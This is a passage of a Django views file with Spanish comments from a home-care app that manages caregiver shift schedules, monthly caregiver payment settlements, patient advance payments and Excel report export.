Cuidadores.objects.all().order_by('nombre')\n\n\tyace\t= Param.objects.filter(tipo='YACE').order_by('descrip')\n\trut_ = pauta.rut # rut paciente, registro en tabla\n\tpaciente = Pacientes.objects.filter(rut=rut_) # solo el paciente del RUT\n\t\n\tnapod = \" Sin nombre\"\n\tfor apod in paciente:\n\t\tnapod = apod.n_apod\n\t\tvalorp1 = apod.valor_t1\t# pago del paciente\t\n\t\tvalorp2 = apod.valor_t2\t# pago del paciente\n\t\tvalorp3 = apod.valor_t3\t# pago del paciente\n\n\tvar_rutcui1 = pauta.rut_t1\n\tvar_rutcui2 = pauta.rut_t2\n\tvar_rutcui3 = pauta.rut_t3\n\t#\n\tif request.method == 'POST':\n\t\tif (form.is_valid()):\n\t\t\trut_t1 = request.POST.get('rut_t1') # contenido del template PAUTA\n\t\t\trut_t2 = request.POST.get('rut_t2') # contenido template \n\t\t\trut_t3 = request.POST.get('rut_t3') # contenido template \n\t\t\t#\n\t\t\ttipo_turno1 = request.POST.get('tipo_turno1')\n\t\t\ttipo_turno2 = request.POST.get('tipo_turno2')\n\t\t\ttipo_turno3 = request.POST.get('tipo_turno3')\n\n\t\t\tpauta.tipo_turno1 = tipo_turno1 # contratado - extra\n\t\t\tpauta.tipo_turno2 = tipo_turno2 # es tipo caracter\n\t\t\tpauta.tipo_turno3 = tipo_turno3 # es tipo caracter\n\t\t\t#\t\n\t\t\t#recar_x = request.POST.get('reca_apod') # recargo x festivo al apoderado\n\t\t\t#pauta.recargo = recar_x\t\n\t\t\t#\n\t\t\t#\n\t\t\t# NUEVO\n\t\t\trecacui_x = request.POST.get('reca_cui') # recargo x festivo al apoderado\n\t\t\tpauta.reca_cui = recacui_x\t\n\n\t\t\t# valores de variables asignadas a campos antes de grabar \n\t\t\tfor r in turno1:\t# barre cuidadores\n\t\t\t\tif r.rut == rut_t1 and r.rut != '0-0':\n\t\t \t\t\tpauta.turno1 = r.nombre\t\n\t\t \t\t\tpauta.valor_t1 = r.apago1 \t# costo cuidador turno1\n\t\t \t\t\tpauta.valor_p1 = valorp1\t# pago del paciente\n\n\t\t\tfor r in turno2:\n\t\t\t\tif r.rut == rut_t2 and r.rut != '0-0':\n\t\t \t\t\tpauta.turno2 = r.nombre\n\t\t \t\t\tpauta.valor_t2 = r.apago2\t# costo cuidador turno2\n\t\t \t\t\tpauta.valor_p2 = valorp2\t# pago del paciente\n\n\n\t\t\tfor r in turno3:\n\t\t\t\tif r.rut == rut_t3 and r.rut != '0-0':\n\t\t \t\t\tpauta.turno3 = r.nombre\t\n\t\t \t\t\tpauta.valor_t3 = r.apago3\t# costo cuidador turno3\n\t\t \t\t\tpauta.valor_p3 = valorp3\t# pago del paciente\n\n\t\t\tform.save()\n\t\t\treturn redirect('grid_pauta')\n\t\telse:\n\t\t\treturn HttpResponse(\"Algo salió mal y no ha grabado\"+str(form))\n\n\t#despliega el template para modificacion\n\tform = PautaForm(instance=pauta) # trae el registro completo\n\tvar_yace = pauta.yace\n\t#\n\tif pauta.reca_cui == None:\n\t\tpauta.reca_cui = '0'\n\tvar_reca = aReca_apod[int(pauta.reca_cui)] # obtiene la glosa del arreglo\n\t# \n\tvar_tip1 = tipo_turno[int(pauta.tipo_turno1)] # obtiene la glosa del arreglo\n\tvar_tip2 = tipo_turno[int(pauta.tipo_turno2)] # obtiene la glosa del arreglo\n\tvar_tip3 = tipo_turno[int(pauta.tipo_turno3)] # obtiene la glosa del arreglo\n\n\tform.fecha = fecha # 11-06-2020\n\n\tcontext = {\n\t\t\t\"form\":form,\n\t\t\t\"variable1\":variable1,\n\t\t\t\"napod\":napod,\n\t\t\t\"yace\":yace,\n\t\t\t\"var_yace\":var_yace,\n\t\t\t\"turno1\":turno1,\n\t\t\t\"turno2\":turno2,\n\t\t\t\"turno3\":turno3,\n\t\t\t\"var_rutcui1\":var_rutcui1,\n\t\t\t\"var_rutcui2\":var_rutcui2,\n\t\t\t\"var_rutcui3\":var_rutcui3,\n\t\t\t\"var_tip1\":var_tip1,\n\t\t\t\"var_tip2\":var_tip2,\n\t\t\t\"var_tip3\":var_tip3,\n\t\t\t\"tipo_turno\":tipo_turno,\n\t\t\t\"aReca_apod\":aReca_apod,\n\t\t\t\"var_reca\":var_reca,\n\t\t\t}\n\treturn render(request,'ficha_pauta.html',context)\n\n\ndef is_int(s):\n try:\n return int(s)\n except ValueError:\n return False\n\n#def\tvalida_tipoturno():\n#\tif request.POST.get('tipo_turno1') == '0':\n#\t\treturn False\n\n# para usarlo en JS\ndef Eliminapac_nuevo(request,id):\n\t#return HttpResponse(\"Llegó a la vista Eliminapac_nuevo\");\n\tform = Pacientes.objects.get(id=id)\n\tform.delete()\n\treturn redirect('grid_pacientes') # redirige a la URL\n\n# INFORMES DE LIQUIDACION\n@login_required(login_url='login_ini')\ndef info(request):\n\tvariable1 = 'Liquidación Mensual de Cuidadores/Asistentes'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo_excel2 = \"/static/img/EXCEL0D2.ICO\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\t# El indice de los arreglos parten con cero\t\t\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\t#\n\t# pauta solo del presente mes\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] \n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\t\n\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('rut')\n\tresupauta = Resupauta.objects.all() # resumen de pauta\n\tResupauta.objects.all().delete() # borra el contenido de la tabla\n\t#\n\t# limpia y puebla ai_pauta_aux\t\n\tpauta_aux = Pauta_aux.objects.all() # Guarda pautas segun rango de fecha\n\tPauta_aux.objects.all().delete() \t# Borra el contenido de la tabla\n\n\t# limpia y puebla ai_pagocui_aux\t\n\tpauta_aux = Pagocui_aux.objects.all() # para INFO, excel cartola cuidadores\n\tPagocui_aux.objects.all().delete() \t# Borra el contenido de la tabla\n\n\t# Q' esten en rango de fecha, y que: valor_t1,valor_t2 y valor_t3 no esten vacios\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin)).exclude(valor_t1__exact=None,valor_t2__exact=None,valor_t3__exact=None) \n\n\tfor pau in pauta:\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_pauta_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno1,rut_t2,turno2,tipo_turno2,rut_t3,turno3,tipo_turno3,valor_t1,valor_t2,valor_t3,reca_cui,valor_p1,valor_p2,valor_p3)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s, %s,%s,%s,%s)\",\n\t\t[pau.rut,pau.paciente,pau.fecha,\n\t\tpau.rut_t1,pau.turno1,pau.tipo_turno1,\n\t\tpau.rut_t2,pau.turno2,pau.tipo_turno2,\n\t\tpau.rut_t3,pau.turno3,pau.tipo_turno3,\n\t\tpau.valor_t1,pau.valor_t2,pau.valor_t3,pau.reca_cui,\n\t\tpau.valor_p1,pau.valor_p2,pau.valor_p3,\n\t\t])\n\n\tdias = []\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\t# define 3 años para atras + uno para adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\n\tcuenta = 0\n\tfor ss in cuidador:\n\t\tcuenta = cuenta + 1\n\n\tfor zz in cuidador:\n\t\trut_x = zz.rut\n\t\tnombre_x = zz.nombre\n\n\t\t#cuantos turnos de MAÑANA\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t1=rut_x)\n\t\tt1 = 0\t# total turnos\n\t\tvt1 = 0\n\t\tif pauta.exists() != False: # si el filtro arroja vacio o no\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.valor_t1 != None:\n\t\t\t\t\tt1=t1 + 1\t\n\t\t\t\t\tvt1 = vt1 + int(ww.valor_t1) # valor total de turnos MAÑANA\n\n\t\t#cuantos turnos de TARDE\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t2=rut_x)\n\t\tt2 = 0 # total turnos\n\t\tvt2 = 0\n\t\tif pauta.exists() != False: # si el filtro arroja vacio o no\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.valor_t1 != None:\n\t\t\t\t\tt2=t2 + 1\n\t\t\t\t\tvt2 = vt2 + int(ww.valor_t2) # valor total de turnos TARDE\n\n\t\t#cuantos turnos de NOCHE\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t3=rut_x)\n\t\tt3 = 0 # total turnos\n\t\tvt3 = 0\n\t\tif pauta.exists() != False: # si el filtro arroja vacio o no\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.valor_t1 != None:\n\t\t\t\t\tt3=t3 + 1\n\t\t\t\t\tvt3 = vt3 + int(ww.valor_t3)\t## valor total de turnos NOCHE\n\n\t\ttot_val = vt1 + vt2+ vt3\t\t\n\t\t\n\t\tmes_yy = str(mes_numerico).zfill(2)\n\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_resupauta (rut,nombre,mes,ano,tot_t1,tot_t2,tot_t3,tot_val)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,mes_yy,ano_hoy,t1,t2,t3,tot_val])\n\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin))\n\t\t# Insertar para este cuidador en particular\n\t\tif pauta.exists() != False: # si el filtro arroja no vacio\n\t\t\tfor ww in pauta:\n\t\t\t\tif ww.rut_t1 == rut_x or ww.rut_t2 == rut_x or ww.rut_t3 == rut_x:\n\t\t\t\t\tcursor = connection.cursor()\n\t\t\t\t\tif ww.rut_t1 == rut_x: # cuidador es el ok ?\n\t\t\t\t\t\t#return HttpResponse(\"Entro en turno1\"+str(xx))\n\t\t\t\t\t\tcursor.execute(\"insert into ai_pagocui_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno,valor,reca_cui,turno)\"\n\t\t\t\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t,[ww.rut,ww.paciente,ww.fecha,ww.rut_t1,ww.turno1,ww.tipo_turno1,ww.valor_t1,ww.reca_cui,\"1\"])\n\n\t\t\t\t\tif ww.rut_t2 == rut_x:\n\t\t\t\t\t\t#return HttpResponse(\"Entro en turno2\"+str(xx))\n\t\t\t\t\t\tcursor.execute(\"insert into ai_pagocui_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno,valor,reca_cui,turno)\"\n\t\t\t\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t,[ww.rut,ww.paciente,ww.fecha,ww.rut_t2,ww.turno2,ww.tipo_turno2,ww.valor_t2,ww.reca_cui,\"2\"])\n\n\t\t\t\t\tif ww.rut_t3 == rut_x:\t\n\t\t\t\t\t\t#return HttpResponse(\"Entro en turno3\"+str(xx))\n\t\t\t\t\t\tcursor.execute(\"insert into ai_pagocui_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno,valor,reca_cui,turno)\"\n\t\t\t\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t\t\t\t\t,[ww.rut,ww.paciente,ww.fecha,ww.rut_t3,ww.turno3,ww.tipo_turno3,ww.valor_t3,ww.reca_cui,\"3\"])\n\n\tcontext = {\n\t\t\"resupauta\":resupauta,\n\t\t\"variable1\":variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"dia_hoy\":dia_hoy,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"cuenta\":cuenta,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"logo_excel2\":logo_excel2,\n\t\t\"pauta\":pauta,\n\t\t\"mes_numerico\":mes_numerico,\n\t\t\"fecha_ini\":fecha_ini,\n\t\t\"fecha_fin\":fecha_fin,}\n\n\treturn render(request,'grid_info.html',context)\n\n# Botón: DESPLIEGA SEGUN FECHA\n@login_required(login_url='login_ini')\ndef liquimeses(request):\n\tvariable1 = 'Liquidación Mensual de Cuidadores/Asistentes'\n\tlogo_excel = \"/static/img/EXCEL0D.ICO\"\n\tlogo_excel2 = \"/static/img/EXCEL0D2.ICO\"\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day\n\tmes_hoy = fechahoy.month\n\tano_hoy = fechahoy.year\n\n\tmes_x = request.POST.get('meses') # desde el template x method='POST'\n\tano_x = request.POST.get('ano') # desde el template x method='POST'\n\n\t# El indice de los arreglos parten con cero\t\t\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tmes_hoy = meses[mes_hoy - 1]\t\t # mes en palabras\n\tmes_numerico = meses.index(mes_x)+1 # mes en numero\n\n\t# pauta solo para el mes seleccionado\n\tfecha_ini = str(ano_x)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_x),meses.index(mes_x) + 1)[1] \n\tfecha_fin = str(ano_x)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\n\tcuidador = Cuidadores.objects.all().exclude(rut='0-0').order_by('nombre')\n\tresupauta = Resupauta.objects.all() # resumen de pauta\n\tResupauta.objects.all().delete() # borra el contenido de la tabla\n\n\t# limpia y puebla ai_pauta_aux\t\n\tpauta_aux = Pauta_aux.objects.all() # Guarda pautas segun rango de fecha\n\tPauta_aux.objects.all().delete() \t# borra el contenido de la tabla\n\t# Q' esten en rango de fecha, y que: valor_t1,valor_t2 y valor_t3 no esten vacios\n\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin)).exclude(valor_t1__exact=None,valor_t2__exact=None,valor_t3__exact=None) \n\tfor pau in pauta:\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_pauta_aux (rut,paciente,fecha,rut_t1,turno1,tipo_turno1,rut_t2,turno2,tipo_turno2,rut_t3,turno3,tipo_turno3,valor_t1,valor_t2,valor_t3,reca_cui,valor_p1,valor_p2,valor_p3)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s, %s,%s,%s,%s)\",\n\t\t[pau.rut,pau.paciente,pau.fecha,\n\t\tpau.rut_t1,pau.turno1,pau.tipo_turno1,\n\t\tpau.rut_t2,pau.turno2,pau.tipo_turno2,\n\t\tpau.rut_t3,pau.turno3,pau.tipo_turno3,\n\t\tpau.valor_t1,pau.valor_t2,pau.valor_t3,pau.reca_cui,\n\t\tpau.valor_p1,pau.valor_p2,pau.valor_p3,\n\t\t])\n\t\n\tdias = []\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\t# define 3 años para atras + uno para adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\n\tcuenta = 0\n\tfor ss in cuidador:\n\t\tcuenta = cuenta + 1\n\n\tfor zz in cuidador:\n\t\trut_x = zz.rut\n\t\tnombre_x = zz.nombre\n\n\t\t#cuantos turnos de MAÑANA\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t1=rut_x)\n\t\tt1 = 0\n\t\tvt1 = 0\n\t\tfor ww in pauta:\n\t\t\tt1=t1 + 1\n\t\t\tvt1 = vt1 + int(ww.valor_t1) # valor total de turnos MAÑANA\n\n\t\t#cuantos turnos de TARDE\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t2=rut_x)\n\t\tt2 = 0\n\t\tvt2 = 0\n\t\tfor ww in pauta:\n\t\t\tt2=t2 + 1\n\t\t\tvt2 = vt2 + int(ww.valor_t2) # valor total de turnos TARDE\n\n\t\t#cuantos turnos de NOCHE\n\t\tpauta = Pauta.objects.filter(fecha__range=(fecha_ini, fecha_fin),rut_t3=rut_x)\n\t\tt3 = 0\n\t\tvt3 = 0\n\t\tfor ww in pauta:\n\t\t\tt3=t3 + 1\n\t\t\tvt3 = vt3 + int(ww.valor_t3)\t## valor total de turnos NOCHE\n\n\t\ttot_val = vt1 + vt2+ vt3\t\t\n\t\t\n\t\tmes_yy = str(mes_numerico).zfill(2)\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_resupauta (rut,nombre,mes,ano,tot_t1,tot_t2,tot_t3,tot_val)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,mes_yy,int(ano_x),t1,t2,t3,tot_val])\n\n\tcontext = {\n\t\t\"resupauta\":resupauta,\n\t\t\"variable1\":variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"mes_hoy\":mes_x,\n\t\t\"ano_hoy\":int(ano_x),\n\t\t\"cuenta\":cuenta,\n\t\t\"logo_excel\":logo_excel,\n\t\t\"logo_excel2\":logo_excel2,\n\t\t\"mes_numerico\":mes_numerico,}\n\treturn render(request,'grid_info.html',context)\n\n@login_required(login_url='login_ini')\ndef Detapautaview(request,rut,resu_mes,resu_ano):\n\t#return HttpResponse(resumes)\n\tvariable1 = 'Detalle Liquidación Mensual de Cuidador/Asistente'\n\tmes_hoy = resu_mes\n\tano_hoy = resu_ano\n\trut_x = rut\n\t# El indice de los arreglos parten con cero\t\t\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\n\tmes_numerico = int(mes_hoy) \n\tmes_hoy = meses[mes_numerico - 1]\t# mes en palabras\n\t#\n\t# pauta solo del presente mes\n\tfecha_ini = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-01 00:00:00\"\n\t\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_hoy),meses.index(mes_hoy) + 1)[1] #total de dias del mes\n\n\tfecha_fin = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\t\n\t# rut_x es el del cuidador\n\tpauta = Pauta.objects.filter((Q(rut_t1=rut_x)|Q(rut_t2=rut_x)|Q(rut_t3=rut_x)),\n\t\tfecha__range=(fecha_ini, fecha_fin)) \n\n\tcuidadores = Cuidadores.objects.filter(rut=rut_x)\t\n\tfor cui in cuidadores:\n\t\tnomcui = cui.nombre\n\n\tdetapauta = Detapauta.objects.all()\n\tDetapauta.objects.all().delete() # borra el contenido de la tabla\n\t#\t \n\tdias = []\n\tk=1\n\tfor i in range(31):\n\t\tdias.append(k)\n\t\tk=k+1\n\n\tcuenta = 0\t\t# cuenta registros para mostrar\n\tfor ss in pauta:\n\t\tcuenta = cuenta + 1\n\n\ttot_val = 0\n\ttotal = 0\n\tfor zz in pauta:\n\t\t# Contabiliza y totaliza turnos y valores MAÑANA,TARDE y NOCHE\n\t\tvt1 = 0\n\t\tvt2 = 0\n\t\tvt3 = 0\n\t\tnombre_x = zz.paciente\n\t\tfecha_x = zz.fecha\n\n\t\tif zz.rut_t1 == rut_x:\n\t\t\tvt1 = vt1 + int(zz.valor_t1) # valor total de turnos MAÑANA\n\t\n\t\tif zz.rut_t2 == rut_x:\n\t\t\tvt2 = vt2 + int(zz.valor_t2) # valor total de turnos MAÑANA\n\t\n\t\tif zz.rut_t3 == rut_x:\n\t\t\tvt3 = vt3 + int(zz.valor_t3) # valor total de turnos MAÑANA\n\n\t\ttot_val = vt1 + vt2 + vt3\t\t\n\t\ttotal = total + tot_val\n\n\t\tdia_y = fecha_x.day\n\t\tmes_y = fecha_x.month\n\t\tano_y = fecha_x.year\n\n\t\tfecha_y = str(ano_y)+\"-\"+str(mes_y).zfill(2)+\"-\"+str(dia_y).zfill(2)\n\n\t\t# transforma caracter a fecha\t\n\t\tfecha_y = datetime.strptime(fecha_y,'%Y-%m-%d')\n\n\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\tcursor.execute(\"insert into ai_detapauta (rut,paciente,fecha,valor_t1,valor_t2,valor_t3,total)\"\n\t\t\"values(%s,%s,%s,%s,%s,%s,%s)\"\n\t\t,[rut_x,nombre_x,fecha_y,vt1,vt2,vt3,tot_val])\n\n\tcontext = {\n\t\t\"detapauta\":detapauta,\n\t\t\"variable1\":variable1,\n\t\t\"cuenta\":cuenta,\n\t\t\"total\":total,\n\t\t\"nomcui\":nomcui,}\n\treturn render(request,'grid_detapauta.html',context)\n\n\n@login_required(login_url='login_ini')\ndef NuevoParam(request):\n\tvariable1 = 'Agregando nuevo parametro al Sistema'\n\t#\n\t#BOTON ACEPTAR en el template\n\tif request.method == \"POST\":\n\t\tform = ParamForm(request.POST,instance=param)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('grid_param')\n\t\telse:\n\t\t\t#falló la actualizacion\n\t\t\tform = ParamForm(instance = param)\n\t\t\tcontext = {\n\t\t\t\t\"variable1\":variable1,\n\t\t\t\t\"form\":form,\n\t\t\t\t\"id_x\":id,\n\t\t\t}\n\t\t\trender(request,'ficha_param.html',context)\n\telse:\n\t\t# x GET - puebla el template.\n\t\tform = ParamForm(request.POST or None) # trae el formulario completo\n\t\tcontext = {\n\t\t\t\"variable1\":variable1,\n\t\t\t\"form\":form,}\n\treturn render(request,'ficha_param.html',context)\n\n@login_required(login_url='login_ini')\ndef Ficha_anticipos(request):\n\tvariable1 = 'Pagos o Anticipos abonados por el Apoderado'\n\terror_new = 'ok'\n\tfechahoy = datetime.now() \n\tdia_hoy = fechahoy.day # numerico\n\tmes_hoy = fechahoy.month # numerico\n\tano_hoy = fechahoy.year # numerico\n\tbanco\t= Param.objects.filter(tipo='BCO').order_by('descrip')\t\n\tabon = Param.objects.filter(tipo='ABON').order_by('codigo') # numerico\n\tmeses = ['Enero','Febrero','Marzo','Abril','Mayo','Junio',\n\t'Julio','Agosto','Septiembre','Octubre','Noviembre','Diciembre']\n\t# define 3 años para atras + uno para adelante\n\tano = [0,0,ano_hoy,0]\n\tano[0] = ano_hoy -2\n\tano[1] = ano_hoy - 1\n\tano[3] = ano_hoy + 1\n\t\t\t\n\tform_anti = AnticiposForm(request.POST or None)\n\tpaciente = Pacientes_aux.objects.all()\n\tfe_ini_x = None\n\tfor ss in paciente:\n\t rut_anticipos = ss.rut\n\t nombre_paciente = ss.nombre\n\t fe_ini_x = ss.fe_ini \n\n\t# Si tiene anticipos en el periodo\n\tvalor_abono = 0\n\tif fe_ini_x != None:\n\t\tfe_i = str(fe_ini_x)[0:10] # entrega '9999-99-99'\tfecha de inicio del paciente\n\t\tfe_f = str(fechahoy)[0:10]\t\t # entrega '9999-99-99' \tfecha actual\n\t\texiste = Anticipos.objects.filter(rut=rut_anticipos,sw_abono=\"1\",fecha__range=(fe_i,fe_f)).exists()\n\t\tif existe==True: \n\t\t\tanticipo = Anticipos.objects.get(rut=rut_anticipos,sw_abono=\"1\",fecha__range=(fe_i,fe_f))\n\t\t\tvalor_abono = anticipo.valor\n\t\n\tswabono_x = request.POST.get('sw_abono') # pago normal / anticipo\n\n\tmes_hoy = meses[mes_hoy - 1]\t# mes en palabras\n\tmes_numerico = fechahoy.month # mes en numero\n\t#fecha_actual = str(ano_hoy)+\"-\"+str(mes_numerico).zfill(2)+\"-\"+str(dia_hoy).zfill(2)\n\tdia_z = str(dia_hoy).zfill(2) \t# transforma a string y llena ceros izq.\n\tmes_z = meses.index(mes_hoy) + 1 # entrega el numerico del mes\n\tmes_z = str(mes_z).zfill(2)\t\t# transforma a string y llena ceros izq.\n\tfecha_actual = str(ano_hoy)+\"-\"+mes_z+\"-\"+dia_z+\" 00:00:00\" # grabar fecha en tabla. Es obligatorio la parte de la hora\n\tif request.method == \"POST\":\n\t\tif valor_abono > 0 and swabono_x == \"1\":\n\t\t\terror_new = \"error1\" # paciente ya tiene ABONO INICIAL\n\t\telse:\t\n\t\t\tvariable1 = \"Despliegue de pacientes\"\n\t\t\tmes_x = request.POST.get('mes') # se devuelve mes-1\n\t\t\tano_x = request.POST.get('ano') # se devuelve como caracter\n\t\t\tvar_abon = request.POST.get('abon') # se devuelve como caracter\n\t\t\tvalor_x = request.POST.get('valor') \n\t\t\tnotas_x = request.POST.get('notas') \n\t\t\tmes_hoy = (str(int(mes_x)+1)).zfill(2) # string numerico\n\t\t\tboleta_x = request.POST.get('boleta')\n\t\t\tform_anti.mes = mes_hoy\n\t\t\tswabono_x = request.POST.get('sw_abono')\n\t\t\tbanco_x = request.POST.get('banco')\n\t\t\tcheque_x = request.POST.get('cheque')\n\t\t\tfecha_ch = request.POST.get('fecha_cheque')+\" 00:00:00\" # grabar fecha en tabla. Es obligatorio la parte de la hora\n\t\t\t\n\t\t\tmes_x = int(mes_x) + 1 # en template, forloop.counter0 entrega desde 0\n\t\t\tmes_x = str(mes_x).zfill(2)\n\t\n\t\t\t# forma fecha con mes y año seleccionado pero con dia de hoy \n\t\t\t# esto se ajusta a pagos-abonos a futuro\n\t\t\tfecha_actual = str(ano_x)+\"-\"+mes_x+\"-\"+dia_z+\" 00:00:00\"\n\t\t\t#\n\t\t\tcursor = connection.cursor() #es necesario: from django.db import connection\n\t\t\tcursor.execute(\"insert into ai_anticipos (rut,fecha,mes,ano,valor,abon,boleta,sw_abono,notas,banco,cheque,fecha_cheque) \"\n\t\t\t\"values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s)\",\n\t\t\t[rut_anticipos,fecha_actual,mes_x,ano_x,valor_x,var_abon,boleta_x,swabono_x,notas_x,banco_x,cheque_x,fecha_ch])\n\t\n\t\t\tfalso_x = False # paciente HABILITADO - DESHABILITADO\n\t\t\tpaciente = Pacientes.objects.all().order_by('nombre') # todos los pacientes\n\t\t\tcontext = {\n\t\t\t\t\"pacientes\":paciente,\n\t\t\t\t\"error_new\":\"error1\",\n\t\t\t\t\"falso_x\":falso_x, \n\t\t\t\t\"variable1\":variable1,\t\t\n\t\t\t\t\"paciente\":paciente,\t\n\t\t\t}\n\t\t\treturn render(request,'grid_pacientes.html',context)\n\n\tvar_banco = '9' # No asignado\t\n\tcontext = {\n\t\t\"form_anti\":form_anti,\n\t\t\"variable1\":variable1,\n\t\t\"meses\":meses,\n\t\t\"ano\":ano,\n\t\t\"mes_hoy\":mes_hoy,\n\t\t\"ano_hoy\":ano_hoy,\n\t\t\"rut_anticipos\":rut_anticipos,\n\t\t\"nombre_paciente\":nombre_paciente,\n\t\t\"fecha_actual\":fecha_actual,\n\t\t\"banco\":banco,\n\t\t\"var_banco\":var_banco,\n\t\t\"abon\":abon,\n\t\t\"error_new\":error_new,\n\t\t\"valor_abono\":valor_abono,\n\t\t}\n\treturn render(request,'ficha_anticipos.html',context)\n\n\n# CARTOLA DE RECAUDACION en excel\n@login_required(login_url='login_ini')\ndef acsv(request):\n\tnom_arch = nombrearch() # Se forma string para nombre de archivo excel\n\tstring_nombre = 'pac'+nom_arch\n\t#\n\tquery = Pauta_aux.objects.all().order_by('rut') # viene filtrada x rango de fecha\n\n\treg_x = 0\n\tfor fech_x in query:\n\t\tfechapautas = fech_x.fecha\n\t\treg_x = reg_x + 1\n\t\tif reg_x == 3:\n\t\t\tbreak\n\n\tmes_x = fechapautas.strftime('%m')\t\t\n\tano_x = fechapautas.strftime('%Y')\t\t\n\t\n\tfecha_ini = str(ano_x)+\"-\"+str(mes_x).zfill(2)+\"-01 00:00:00\"\n\t#total dias del mes\n\ttotdias = calendar.monthrange(int(ano_x),int(mes_x))[1] \n\tfecha_fin = str(ano_x)+\"-\"+str(mes_x).zfill(2)+\"-\"+str(totdias)+\" 00:00:00\"\n\t#\n\t# borra todos los xlsx que comiencen con \"cui\"\n\t#dir = \"C:/Users/usuario/Downloads/\" # descargas\n\t#lista_ficheros = os.listdir(dir)\n\t#for fichero in lista_ficheros:\n\t#\tif fichero.startswith(\"cui\"):\n\t#\t\tos.remove(dir + fichero)\n\t#\t\t\n\twb = Workbook()\n\tws = wb.create_sheet(\"hoja1\",0)\n\tws.column_dimensions['A'].width = 5\n\tws.column_dimensions['B'].width = 12\t# rut paciente\n\tws.column_dimensions['C'].width = 36\t# nombre paciente\n\tws.column_dimensions['D'].width = 17\t# fecha\n\tws.column_dimensions['E'].width = 11\t# rut cuid.\n\tws.column_dimensions['F'].width = 23\t# nombre cuidador\n\tws.column_dimensions['G'].width = 12\t# tipo cuidador\n\tws.column_dimensions['H'].width = 11\t# rut cuid.\n\tws.column_dimensions['I'].width = 23\t# nombre cuidador\n\tws.column_dimensions['J'].width = 12\t# tipo cuidador\n\tws.column_dimensions['K'].width = 11\t# rut cuid.\n\tws.column_dimensions['L'].width = 23\t# nombre cuidador\n\tws.column_dimensions['M'].width = 12\t# tipo cuidador\n\n\tws.column_dimensions['Q'].width 